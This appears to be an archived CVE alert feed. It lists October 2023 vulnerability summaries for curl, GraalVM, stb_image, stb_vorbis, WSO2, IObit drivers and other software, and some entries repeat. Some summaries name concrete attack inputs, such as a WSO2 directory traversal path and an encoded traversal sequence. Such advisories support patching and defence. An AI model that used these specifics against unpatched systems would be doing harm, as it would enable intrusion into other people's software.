🚨 CVE-2023-22091Vulnerability in the Oracle GraalVM for JDK product of Oracle Java SE (component: Compiler). Supported versions that are affected are Oracle GraalVM for JDK: 17.0.8 and 21. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle GraalVM for JDK. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle GraalVM for JDK accessible data as well as unauthorized read access to a subset of Oracle GraalVM for JDK accessible data. CVSS 3.1 Base Score 4.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N).🎖@cveNotify |
|
| 2023-10-25 15:22:31 |
🚨 CVE-2023-5059Santesoft Sante FFT Imaging lacks proper validation of user-supplied data when parsing DICOM files. This could lead to an out-of-bounds read. An attacker could leverage this vulnerability to execute arbitrary code in the context of the current process.🎖@cveNotify |
|
| 2023-10-25 15:22:30 |
🚨 CVE-2023-40153The affected product is vulnerable to a cross-site scripting vulnerability, which could allow an attacker to access the web application to introduce arbitrary Java Script by injecting an XSS payload into the 'hostname' parameter of the vulnerable software.🎖@cveNotify |
|
| 2023-10-25 15:22:28 |
🚨 CVE-2023-41088The affected product is vulnerable to a cleartext transmission of sensitive information vulnerability, which may allow an attacker with access to the network, where clients have access to the DexGate server, could capture traffic. The attacker can later us the information within it to access the application.🎖@cveNotify |
|
| 2023-10-25 15:22:27 |
🚨 CVE-2023-41089The affected product is vulnerable to an improper authentication vulnerability, which may allow an attacker to impersonate a legitimate user as long as the device keeps the session active, since the attack takes advantage of the cookie header to generate "legitimate" requests.🎖@cveNotify |
|
| 2023-10-25 15:22:25 |
🚨 CVE-2023-45810OpenFGA is a flexible authorization/permission engine built for developers and inspired by Google Zanzibar. Affected versions of OpenFGA are vulnerable to a denial of service attack. When a number of `ListObjects` calls are executed, in some scenarios, those calls are not releasing resources even after a response has been sent, and given a sufficient call volume the service as a whole becomes unresponsive. This issue has been addressed in version 1.3.4 and the upgrade is considered backwards compatible. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-10-25 15:22:22 |
🚨 CVE-2023-43776Eaton easyE4 PLC offers a device password protection functionality to facilitate a secure connection and prevent unauthorized access. It was observed that the device password was stored with a weak encoding algorithm in the easyE4 program file when exported to SD card (*.PRG file ending).🎖@cveNotify |
|
| 2023-10-25 15:22:20 |
🚨 CVE-2023-45811Synchrony deobfuscator is a javascript cleaner & deobfuscator. A `__proto__` pollution vulnerability exists in versions before v2.4.4. Successful exploitation could lead to arbitrary code execution. A `__proto__` pollution vulnerability exists in the `LiteralMap` transformer allowing crafted input to modify properties in the Object prototype. A fix has been released in `deobfuscator@2.4.4`. Users are advised to upgrade. Users unable to upgrade should launch node with the [--disable-proto=delete][disable-proto] or [--disable-proto=throw][disable-proto] flags🎖@cveNotify |
|
| 2023-10-25 15:22:18 |
🚨 CVE-2023-38545This flaw makes curl overflow a heap based buffer in the SOCKS5 proxyhandshake.When curl is asked to pass along the host name to the SOCKS5 proxy to allowthat to resolve the address instead of it getting done by curl itself, themaximum length that host name can be is 255 bytes.If the host name is detected to be longer, curl switches to local nameresolving and instead passes on the resolved address only. Due to this bug,the local variable that means "let the host resolve the name" could get thewrong value during a slow SOCKS5 handshake, and contrary to the intention,copy the too long host name to the target buffer instead of copying just theresolved address there.The target buffer being a heap based buffer, and the host name coming from theURL that curl has been told to operate with.🎖@cveNotify |
|
| 2023-10-25 15:22:16 |
🚨 CVE-2023-38546This flaw allows an attacker to insert cookies at will into a running programusing libcurl, if the specific series of conditions are met.libcurl performs transfers. In its API, an application creates "easy handles"that are the individual handles for single transfers.libcurl provides a function call that duplicates en easy handle called[curl_easy_duphandle](https://curl.se/libcurl/c/curl_easy_duphandle.html).If a transfer has cookies enabled when the handle is duplicated, thecookie-enable state is also cloned - but without cloning the actualcookies. If the source handle did not read any cookies from a specific file ondisk, the cloned version of the handle would instead store the file name as`none` (using the four ASCII letters, no quotes).Subsequent use of the cloned handle that does not explicitly set a source toload cookies from would then inadvertently load cookies from a file named`none` - if such a file exists and is readable in the current directory of theprogram using libcurl. And if using the correct file format of course.🎖@cveNotify |
|
| 2023-10-25 15:22:13 |
🚨 CVE-2023-38552When the Node.js policy feature checks the integrity of a resource against a trusted manifest, the application can intercept the operation and return a forged checksum to the node's policy implementation, thus effectively disabling the integrity check.Impacts:This vulnerability affects all users using the experimental policy mechanism in all active release lines: 18.x and, 20.x.Please note that at the time this CVE was issued, the policy mechanism is an experimental feature of Node.js.🎖@cveNotify |
|
| 2023-10-25 15:22:12 |
🚨 CVE-2023-31069An issue was discovered in TSplus Remote Access through 16.0.2.14. Credentials are stored as cleartext within the HTML source code of the login page.🎖@cveNotify |
|
| 2023-10-25 15:22:10 |
🚨 CVE-2023-45952An arbitrary file upload vulnerability in the component ajax_link.php of lylme_spage v1.7.0 allows attackers to execute arbitrary code via uploading a crafted file.🎖@cveNotify |
|
| 2023-10-25 15:22:07 |
🚨 CVE-2023-0903A vulnerability was found in SourceCodester Employee Task Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file edit-task.php. The manipulation of the argument task_id leads to sql injection. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-221452.🎖@cveNotify |
|
| 2023-10-25 15:22:06 |
🚨 CVE-2023-22025Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition, Oracle GraalVM for JDK product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Oracle Java SE: 8u381-perf, 17.0.8, 21; Oracle GraalVM for JDK: 17.0.8 and 21. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition, Oracle GraalVM for JDK. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition, Oracle GraalVM for JDK accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).🎖@cveNotify |
|
| 2023-10-25 15:22:04 |
🚨 CVE-2023-27132TSplus Remote Work 16.0.0.0 places a cleartext password on the "var pass" line of the HTML source code for the secure single sign-on web portal. NOTE: CVE-2023-31069 is only about the TSplus Remote Access product, not the TSplus Remote Work product.🎖@cveNotify |
|
| 2023-10-25 15:22:03 |
🚨 CVE-2023-43777Eaton easySoft software is used to program easy controllers and displays for configuring, programming and defining parameters for all the intelligent relays. This software has a password protection functionality to secure the project file from unauthorized access. This password was being stored insecurely and could be retrieved by skilled adversaries.🎖@cveNotify |
|
| 2023-10-25 15:22:01 |
🚨 CVE-2023-27793An issue discovered in IXP Data Easy Install v.6.6.14884.0 allows local attackers to gain escalated privileges via weak encoding of sensitive information.🎖@cveNotify |
|
| 2023-10-24 00:52:14 |
🚨 CVE-2023-33517carRental 1.0 is vulnerable to Incorrect Access Control (Arbitrary File Read on the Back-end System).🎖@cveNotify |
|
| 2023-10-24 00:52:13 |
🚨 CVE-2023-43358Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Title parameter in the News Menu component.🎖@cveNotify |
|
| 2023-10-24 00:52:12 |
🚨 CVE-2023-44760Multiple Cross Site Scripting (XSS) vulnerabilities in Concrete CMS v.9.2.1 allow an attacker to execute arbitrary code via a crafted script to the Header and Footer Tracking Codes of the SEO & Statistics.🎖@cveNotify |
|
| 2023-10-24 00:52:10 |
🚨 CVE-2023-45998kodbox 1.44 is vulnerable to Cross Site Scripting (XSS). Customizing global HTML results in storing XSS.🎖@cveNotify |
|
| 2023-10-24 00:52:09 |
🚨 CVE-2023-5633The reference count changes made as part of the CVE-2023-33951 and CVE-2023-33952 fixes exposed a use-after-free flaw in the way memory objects were handled when they were being used to store a surface. When running inside a VMware guest with 3D acceleration enabled, a local, unprivileged user could potentially use this flaw to escalate their privileges.🎖@cveNotify |
|
| 2023-10-24 00:52:08 |
🚨 CVE-2023-4569A memory leak flaw was found in nft_set_catchall_flush in net/netfilter/nf_tables_api.c in the Linux Kernel. This issue may allow a local attacker to cause double-deactivations of catchall elements, which can result in a memory leak.🎖@cveNotify |
|
| 2023-10-24 00:52:07 |
🚨 CVE-2022-46945Nagvis before 1.9.34 was discovered to contain an arbitrary file read vulnerability via the component /core/classes/NagVisHoverUrl.php.🎖@cveNotify |
|
| 2023-10-24 00:52:06 |
🚨 CVE-2022-29464Certain WSO2 products allow unrestricted file upload with resultant remote code execution. The attacker must use a /fileupload endpoint with a Content-Disposition directory traversal sequence to reach a directory under the web root, such as a ../../../../repository/deployment/server/webapps directory. This affects WSO2 API Manager 2.2.0 up to 4.0.0, WSO2 Identity Server 5.2.0 up to 5.11.0, WSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0 and 5.6.0, WSO2 Identity Server as Key Manager 5.3.0 up to 5.11.0, WSO2 Enterprise Integrator 6.2.0 up to 6.6.0, WSO2 Open Banking AM 1.4.0 up to 2.0.0 and WSO2 Open Banking KM 1.4.0, up to 2.0.0.🎖@cveNotify |
|
| 2023-10-24 00:52:04 |
🚨 CVE-2022-26184Poetry v1.1.9 and below was discovered to contain an untrusted search path which causes the application to behave in unexpected ways when users execute Poetry commands in a directory containing malicious content. This vulnerability occurs when the application is ran on Windows OS.🎖@cveNotify |
|
| 2023-10-23 13:22:04 |
🚨 CVE-2023-46306The web administration interface in NetModule Router Software (NRSW) 4.6 before 4.6.0.106 and 4.8 before 4.8.0.101 executes an OS command constructed with unsanitized user input: shell metacharacters in the /admin/gnssAutoAlign.php device_id parameter. This occurs because another thread can be started before the trap that triggers the cleanup function. A successful exploit could allow an authenticated user to execute arbitrary commands with elevated privileges. NOTE: this is different from CVE-2023-0861 and CVE-2023-0862, which were fixed in version 4.6.0.105.🎖@cveNotify |
|
| 2023-10-23 13:22:03 |
🚨 CVE-2023-46303link_to_local_path in ebooks/conversion/plugins/html_input.py in calibre before 6.19.0 can, by default, add resources outside of the document root.🎖@cveNotify |
|
| 2023-10-23 13:22:02 |
🚨 CVE-2021-46897views.py in Wagtail CRX CodeRed Extensions (formerly CodeRed CMS or coderedcms) before 0.22.3 allows upward protected/..%2f..%2f path traversal when serving protected media.🎖@cveNotify |
|
| 2023-10-23 13:22:00 |
🚨 CVE-2021-46898views/switch.py in django-grappelli (aka Django Grappelli) before 2.15.2 attempts to prevent external redirection with startswith("/") but this does not consider a protocol-relative URL (e.g., //example.com) attack.🎖@cveNotify |
|
| 2023-10-23 13:21:59 |
🚨 CVE-2023-38275IBM Cognos Dashboards on Cloud Pak for Data 4.7.0 exposes sensitive information in container images which could lead to further attacks against the system. IBM X-Force ID: 260730.🎖@cveNotify |
|
| 2023-10-23 13:21:58 |
🚨 CVE-2023-38276IBM Cognos Dashboards on Cloud Pak for Data 4.7.0 exposes sensitive information in environment variables which could aid in further attacks against the system. IBM X-Force ID: 260736.🎖@cveNotify |
|
| 2023-10-23 13:21:57 |
🚨 CVE-2023-38735IBM Cognos Dashboards on Cloud Pak for Data 4.7.0 could allow a remote attacker to bypass security restrictions, caused by a reverse tabnabbing flaw. An attacker could exploit this vulnerability and redirect a victim to a phishing site. IBM X-Force ID: 262482.🎖@cveNotify |
|
| 2023-10-23 00:52:13 |
🚨 CVE-2023-46303link_to_local_path in ebooks/conversion/plugins/html_input.py in calibre before 6.19.0 can, by default, add resources outside of the document root.🎖@cveNotify |
|
| 2023-10-23 00:52:11 |
🚨 CVE-2023-2246A vulnerability has been found in SourceCodester Online Pizza Ordering System 1.0 and classified as critical. This vulnerability affects unknown code of the file admin/ajax.php?action=save_settings. The manipulation of the argument img leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-227236.🎖@cveNotify |
|
| 2023-10-23 00:52:10 |
🚨 CVE-2023-2241A vulnerability, which was classified as critical, was found in PoDoFo 0.10.0. Affected is the function readXRefStreamEntry of the file PdfXRefStreamParserObject.cpp. The manipulation leads to heap-based buffer overflow. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The patch is identified as 535a786f124b739e3c857529cecc29e4eeb79778. It is recommended to apply a patch to fix this issue. VDB-227226 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-23 00:52:08 |
🚨 CVE-2023-2091A vulnerability classified as critical was found in KylinSoft youker-assistant on KylinOS. Affected by this vulnerability is the function adjust_cpufreq_scaling_governer. The manipulation leads to os command injection. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. Upgrading to version 3.1.4.13 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-226099.🎖@cveNotify |
|
| 2023-10-23 00:52:07 |
🚨 CVE-2023-46300iTerm2 before 3.4.20 allow (potentially remote) code execution because of mishandling of certain escape sequences related to tmux integration.🎖@cveNotify |
|
| 2023-10-23 00:52:06 |
🚨 CVE-2023-46301iTerm2 before 3.4.20 allow (potentially remote) code execution because of mishandling of certain escape sequences related to upload.🎖@cveNotify |
|
| 2023-10-23 00:52:02 |
🚨 CVE-2023-46298Next.js before 13.4.20-canary.13 lacks a cache-control header and thus empty prefetch responses may sometimes be cached by a CDN, causing a denial of service to all users requesting the same URL via that CDN.🎖@cveNotify |
|
| 2023-10-23 00:52:01 |
🚨 CVE-2023-38276IBM Cognos Dashboards on Cloud Pak for Data 4.7.0 exposes sensitive information in environment variables which could aid in further attacks against the system. IBM X-Force ID: 260736.🎖@cveNotify |
|
| 2023-10-23 00:52:00 |
🚨 CVE-2023-38735IBM Cognos Dashboards on Cloud Pak for Data 4.7.0 could allow a remote attacker to bypass security restrictions, caused by a reverse tabnabbing flaw. An attacker could exploit this vulnerability and redirect a victim to a phishing site. IBM X-Force ID: 262482.🎖@cveNotify |
|
| 2023-10-23 00:51:59 |
🚨 CVE-2023-38275IBM Cognos Dashboards on Cloud Pak for Data 4.7.0 exposes sensitive information in container images which could lead to further attacks against the system. IBM X-Force ID: 260730.🎖@cveNotify |
|
| 2023-10-23 00:51:58 |
🚨 CVE-2021-46784In Squid 3.x through 3.5.28, 4.x through 4.17, and 5.x before 5.6, due to improper buffer management, a Denial of Service can occur when processing long Gopher server responses.🎖@cveNotify |
|
| 2023-10-21 16:22:08 |
🚨 CVE-2023-44981Authorization Bypass Through User-Controlled Key vulnerability in Apache ZooKeeper. If SASL Quorum Peer authentication is enabled in ZooKeeper (quorum.auth.enableSasl=true), the authorization is done by verifying that the instance part in SASL authentication ID is listed in zoo.cfg server list. The instance part in SASL auth ID is optional and if it's missing, like 'eve@EXAMPLE.COM', the authorization check will be skipped. As a result an arbitrary endpoint could join the cluster and begin propagating counterfeit changes to the leader, essentially giving it complete read-write access to the data tree. Quorum Peer authentication is not enabled by default.Users are recommended to upgrade to version 3.9.1, 3.8.3, 3.7.2, which fixes the issue.Alternately ensure the ensemble election/quorum communication is protected by a firewall as this will mitigate the issue.See the documentation for more details on correct cluster administration.🎖@cveNotify |
|
| 2023-10-21 16:22:07 |
🚨 CVE-2023-1640A vulnerability classified as problematic was found in IObit Malware Fighter 9.4.0.776. This vulnerability affects the function 0x222010 in the library ObCallbackProcess.sys of the component IOCTL Handler. The manipulation leads to denial of service. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-224020.🎖@cveNotify |
|
| 2023-10-21 16:22:06 |
🚨 CVE-2023-1641A vulnerability, which was classified as problematic, has been found in IObit Malware Fighter 9.4.0.776. This issue affects the function 0x222018 in the library ObCallbackProcess.sys of the component IOCTL Handler. The manipulation leads to denial of service. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The identifier VDB-224021 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-21 16:22:05 |
🚨 CVE-2023-1642A vulnerability, which was classified as problematic, was found in IObit Malware Fighter 9.4.0.776. Affected is the function 0x222034/0x222038/0x22203C/0x222040 in the library ObCallbackProcess.sys of the component IOCTL Handler. The manipulation leads to denial of service. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. VDB-224022 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-21 16:22:04 |
🚨 CVE-2023-1643A vulnerability has been found in IObit Malware Fighter 9.4.0.776 and classified as problematic. Affected by this vulnerability is the function 0x8001E000/0x8001E004/0x8001E018/0x8001E01C/0x8001E024/0x8001E040 in the library ImfHpRegFilter.sys of the component IOCTL Handler. The manipulation leads to denial of service. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-224023.🎖@cveNotify |
|
| 2023-10-21 16:22:02 |
🚨 CVE-2023-1644A vulnerability was found in IObit Malware Fighter 9.4.0.776 and classified as problematic. Affected by this issue is the function 0x8018E010 in the library IMFCameraProtect.sys of the component IOCTL Handler. The manipulation leads to denial of service. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-224024.🎖@cveNotify |
|
| 2023-10-21 16:22:01 |
🚨 CVE-2023-1645A vulnerability was found in IObit Malware Fighter 9.4.0.776. It has been classified as problematic. This affects the function 0x8018E008 in the library IMFCameraProtect.sys of the component IOCTL Handler. The manipulation leads to denial of service. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The identifier VDB-224025 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-21 16:22:00 |
🚨 CVE-2023-1646A vulnerability was found in IObit Malware Fighter 9.4.0.776. It has been declared as critical. This vulnerability affects the function 0x8018E000/0x8018E004 in the library IMFCameraProtect.sys of the component IOCTL Handler. The manipulation leads to stack-based buffer overflow. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. VDB-224026 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-21 16:21:59 |
🚨 CVE-2023-1639A vulnerability classified as problematic has been found in IObit Malware Fighter 9.4.0.776. This affects the function 0x8001E04C in the library ImfRegistryFilter.sys of the component IOCTL Handler. The manipulation leads to denial of service. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-224019.🎖@cveNotify |
|
| 2023-10-21 16:21:58 |
🚨 CVE-2023-1638A vulnerability was found in IObit Malware Fighter 9.4.0.776. It has been rated as problematic. Affected by this issue is the function 0x8001E024/0x8001E040 in the library ImfRegistryFilter.sys of the component IOCTL Handler. The manipulation leads to denial of service. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. VDB-224018 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-21 10:52:20 |
🚨 CVE-2023-45661stb_image is a single file MIT licensed library for processing images. A crafted image file may trigger out of bounds memcpy read in `stbi__gif_load_next`. This happens because two_back points to a memory address lower than the start of the buffer out. This issue may be used to leak internal memory allocation information.🎖@cveNotify |
|
| 2023-10-21 10:52:19 |
🚨 CVE-2023-45662stb_image is a single file MIT licensed library for processing images. When `stbi_set_flip_vertically_on_load` is set to `TRUE` and `req_comp` is set to a number that doesn’t match the real number of components per pixel, the library attempts to flip the image vertically. A crafted image file can trigger `memcpy` out-of-bounds read because `bytes_per_pixel` used to calculate `bytes_per_row` doesn’t match the real image array dimensions.🎖@cveNotify |
|
| 2023-10-21 10:52:17 |
🚨 CVE-2023-45663stb_image is a single file MIT licensed library for processing images. The stbi__getn function reads a specified number of bytes from context (typically a file) into the specified buffer. In case the file stream points to the end, it returns zero. There are two places where its return value is not checked: In the `stbi__hdr_load` function and in the `stbi__tga_load` function. The latter of the two is likely more exploitable as an attacker may also control the size of an uninitialized buffer.🎖@cveNotify |
|
| 2023-10-21 10:52:16 |
🚨 CVE-2023-45664stb_image is a single file MIT licensed library for processing images. A crafted image file can trigger `stbi__load_gif_main_outofmem` attempt to double-free the out variable. This happens in `stbi__load_gif_main` because when the `layers * stride` value is zero the behavior is implementation defined, but common that realloc frees the old memory and returns null pointer. Since it attempts to double-free the memory a few lines below the first “free”, the issue can be potentially exploited only in a multi-threaded environment. In the worst case this may lead to code execution.🎖@cveNotify |
|
| 2023-10-21 10:52:15 |
🚨 CVE-2023-45666stb_image is a single file MIT licensed library for processing images. It may look like `stbi__load_gif_main` doesn’t give guarantees about the content of output value `*delays` upon failure. Although it sets `*delays` to zero at the beginning, it doesn’t do it in case the image is not recognized as GIF and a call to `stbi__load_gif_main_outofmem` only frees possibly allocated memory in `*delays` without resetting it to zero. Thus it would be fair to say the caller of `stbi__load_gif_main` is responsible to free the allocated memory in `*delays` only if `stbi__load_gif_main` returns a non null value. However at the same time the function may return null value, but fail to free the memory in `*delays` if internally `stbi__convert_format` is called and fails. Thus the issue may lead to a memory leak if the caller chooses to free `delays` only when `stbi__load_gif_main` didn’t fail or to a double-free if the `delays` is always freed🎖@cveNotify |
|
| 2023-10-21 10:52:13 |
🚨 CVE-2023-45667stb_image is a single file MIT licensed library for processing images.If `stbi__load_gif_main` in `stbi_load_gif_from_memory` fails it returns a null pointer and may keep the `z` variable uninitialized. In case the caller also sets the flip vertically flag, it continues and calls `stbi__vertical_flip_slices` with the null pointer result value and the uninitialized `z` value. This may result in a program crash.🎖@cveNotify |
|
| 2023-10-21 10:52:12 |
🚨 CVE-2023-45675stb_vorbis is a single file MIT licensed library for processing ogg vorbis files. A crafted file may trigger out of bounds write in `f->vendor[len] = (char)'\0';`. The root cause is that if the len read in `start_decoder` is `-1` and `len + 1` becomes 0 when passed to `setup_malloc`. The `setup_malloc` behaves differently when `f->alloc.alloc_buffer` is pre-allocated. Instead of returning `NULL` as in `malloc` case it shifts the pre-allocated buffer by zero and returns the currently available memory block. This issue may lead to code execution.🎖@cveNotify |
|
| 2023-10-21 10:52:11 |
🚨 CVE-2023-45676stb_vorbis is a single file MIT licensed library for processing ogg vorbis files. A crafted file may trigger out of bounds write in `f->vendor[i] = get8_packet(f);`. The root cause is an integer overflow in `setup_malloc`. A sufficiently large value in the variable `sz` overflows with `sz+7` in and the negative value passes the maximum available memory buffer check. This issue may lead to code execution.🎖@cveNotify |
|
| 2023-10-21 10:52:10 |
🚨 CVE-2023-45677stb_vorbis is a single file MIT licensed library for processing ogg vorbis files. A crafted file may trigger out of bounds write in `f->vendor[len] = (char)'\0';`. The root cause is that if `len` read in `start_decoder` is a negative number and `setup_malloc` successfully allocates memory in that case, but memory write is done with a negative index `len`. Similarly if len is INT_MAX the integer overflow len+1 happens in `f->vendor = (char*)setup_malloc(f, sizeof(char) * (len+1));` and `f->comment_list[i] = (char*)setup_malloc(f, sizeof(char) * (len+1));`. This issue may lead to code execution.🎖@cveNotify |
|
| 2023-10-21 10:52:09 |
🚨 CVE-2023-45678stb_vorbis is a single file MIT licensed library for processing ogg vorbis files. A crafted file may trigger out of buffer write in `start_decoder` because at maximum `m->submaps` can be 16 but `submap_floor` and `submap_residue` are declared as arrays of 15 elements. This issue may lead to code execution.🎖@cveNotify |
|
| 2023-10-21 10:52:07 |
🚨 CVE-2023-45679stb_vorbis is a single file MIT licensed library for processing ogg vorbis files. A crafted file may trigger memory allocation failure in `start_decoder`. In that case the function returns early, but some of the pointers in `f->comment_list` are left initialized and later `setup_free` is called on these pointers in `vorbis_deinit`. This issue may lead to code execution.🎖@cveNotify |
|
| 2023-10-21 10:52:06 |
🚨 CVE-2023-45680stb_vorbis is a single file MIT licensed library for processing ogg vorbis files. A crafted file may trigger memory allocation failure in `start_decoder`. In that case the function returns early, the `f->comment_list` is set to `NULL`, but `f->comment_list_length` is not reset. Later in `vorbis_deinit` it tries to dereference the `NULL` pointer. This issue may lead to denial of service.🎖@cveNotify |
|
| 2023-10-21 10:52:05 |
🚨 CVE-2023-45681stb_vorbis is a single file MIT licensed library for processing ogg vorbis files. A crafted file may trigger memory write past an allocated heap buffer in `start_decoder`. The root cause is a potential integer overflow in `sizeof(char*) * (f->comment_list_length)` which may make `setup_malloc` allocate less memory than required. Since there is another integer overflow an attacker may overflow it too to force `setup_malloc` to return 0 and make the exploit more reliable. This issue may lead to code execution.🎖@cveNotify |
|
| 2023-10-21 10:52:04 |
🚨 CVE-2023-45682stb_vorbis is a single file MIT licensed library for processing ogg vorbis files. A crafted file may trigger out of bounds read in `DECODE` macro when `var` is negative. As it can be seen in the definition of `DECODE_RAW` a negative `var` is a valid value. This issue may be used to leak internal memory allocation information.🎖@cveNotify |
|
| 2023-10-21 10:52:02 |
🚨 CVE-2023-38190An issue was discovered in SuperWebMailer 9.00.0.01710. It allows Export SQL Injection via the size parameter.🎖@cveNotify |
|
| 2023-10-21 10:52:01 |
🚨 CVE-2023-38192An issue was discovered in SuperWebMailer 9.00.0.01710. It allows superadmincreate.php XSS via crafted incorrect passwords.🎖@cveNotify |
|
| 2023-10-21 10:52:00 |
🚨 CVE-2023-38193An issue was discovered in SuperWebMailer 9.00.0.01710. It allows Remote Code Execution via a crafted sendmail command line.🎖@cveNotify |
|
| 2023-10-21 10:51:58 |
🚨 CVE-2023-38194An issue was discovered in SuperWebMailer 9.00.0.01710. It allows keepalive.php XSS via a GET parameter.🎖@cveNotify |
|
| 2023-10-21 10:51:57 |
🚨 CVE-2023-46003I-doit pro 25 and below is vulnerable to Cross Site Scripting (XSS) via index.php.🎖@cveNotify |
|
| 2023-10-21 10:51:56 |
🚨 CVE-2023-5132The Soisy Pagamento Rateale plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the parseRemoteRequest function in versions up to, and including, 6.0.1. This makes it possible for unauthenticated attackers with knowledge of an existing WooCommerce Order ID to expose sensitive WooCommerce order information (e.g., Name, Address, Email Address, and other order metadata).🎖@cveNotify |
|
| 2023-10-21 06:23:08 |
🚨 CVE-2023-38192An issue was discovered in SuperWebMailer 9.00.0.01710. It allows superadmincreate.php XSS via crafted incorrect passwords.🎖@cveNotify |
|
| 2023-10-21 06:23:07 |
🚨 CVE-2023-38193An issue was discovered in SuperWebMailer 9.00.0.01710. It allows Remote Code Execution via a crafted sendmail command line.🎖@cveNotify |
|
| 2023-10-21 06:23:05 |
🚨 CVE-2023-38194An issue was discovered in SuperWebMailer 9.00.0.01710. It allows keepalive.php XSS via a GET parameter.🎖@cveNotify |
|
| 2023-10-21 06:23:04 |
🚨 CVE-2023-46003I-doit pro 25 and below is vulnerable to Cross Site Scripting (XSS) via index.php.🎖@cveNotify |
|
| 2023-10-21 06:23:02 |
🚨 CVE-2023-36321Connected Vehicle Systems Alliance (COVESA) up to v2.18.8 was discovered to contain a buffer overflow via the component /shared/dlt_common.c.🎖@cveNotify |
|
| 2023-10-21 06:23:01 |
🚨 CVE-2023-36806Contao is an open source content management system. Starting in version 4.0.0 and prior to versions 4.9.42, 4.13.28, and 5.1.10, it is possible for untrusted backend users to inject malicious code into headline fields in the back end, which will be executed both in the element preview (back end) and on the website (front end). Installations are only affected if there are untrusted back end users who have the rights to modify headline fields, or other fields using the input unit widget. Contao 4.9.42, 4.13.28, and 5.1.10 have a patch for this issue. As a workaround, disable the login for all untrusted back end users.🎖@cveNotify |
|
| 2023-10-21 06:23:00 |
🚨 CVE-2023-45661stb_image is a single file MIT licensed library for processing images. A crafted image file may trigger out of bounds memcpy read in `stbi__gif_load_next`. This happens because two_back points to a memory address lower than the start of the buffer out. This issue may be used to leak internal memory allocation information.🎖@cveNotify |
|
| 2023-10-21 06:22:59 |
🚨 CVE-2023-45662stb_image is a single file MIT licensed library for processing images. When `stbi_set_flip_vertically_on_load` is set to `TRUE` and `req_comp` is set to a number that doesn’t match the real number of components per pixel, the library attempts to flip the image vertically. A crafted image file can trigger `memcpy` out-of-bounds read because `bytes_per_pixel` used to calculate `bytes_per_row` doesn’t match the real image array dimensions.🎖@cveNotify |
|
| 2023-10-21 06:22:58 |
🚨 CVE-2023-45663stb_image is a single file MIT licensed library for processing images. The stbi__getn function reads a specified number of bytes from context (typically a file) into the specified buffer. In case the file stream points to the end, it returns zero. There are two places where its return value is not checked: In the `stbi__hdr_load` function and in the `stbi__tga_load` function. The latter of the two is likely more exploitable as an attacker may also control the size of an uninitialized buffer.🎖@cveNotify |
|
| 2023-10-21 06:22:57 |
🚨 CVE-2023-45664stb_image is a single file MIT licensed library for processing images. A crafted image file can trigger `stbi__load_gif_main_outofmem` attempt to double-free the out variable. This happens in `stbi__load_gif_main` because when the `layers * stride` value is zero the behavior is implementation defined, but common that realloc frees the old memory and returns null pointer. Since it attempts to double-free the memory a few lines below the first “free”, the issue can be potentially exploited only in a multi-threaded environment. In the worst case this may lead to code execution.🎖@cveNotify |
|
| 2023-10-21 06:22:56 |
🚨 CVE-2023-45666stb_image is a single file MIT licensed library for processing images. It may look like `stbi__load_gif_main` doesn’t give guarantees about the content of output value `*delays` upon failure. Although it sets `*delays` to zero at the beginning, it doesn’t do it in case the image is not recognized as GIF and a call to `stbi__load_gif_main_outofmem` only frees possibly allocated memory in `*delays` without resetting it to zero. Thus it would be fair to say the caller of `stbi__load_gif_main` is responsible to free the allocated memory in `*delays` only if `stbi__load_gif_main` returns a non null value. However at the same time the function may return null value, but fail to free the memory in `*delays` if internally `stbi__convert_format` is called and fails. Thus the issue may lead to a memory leak if the caller chooses to free `delays` only when `stbi__load_gif_main` didn’t fail or to a double-free if the `delays` is always freed🎖@cveNotify |
|
| 2023-10-21 06:22:55 |
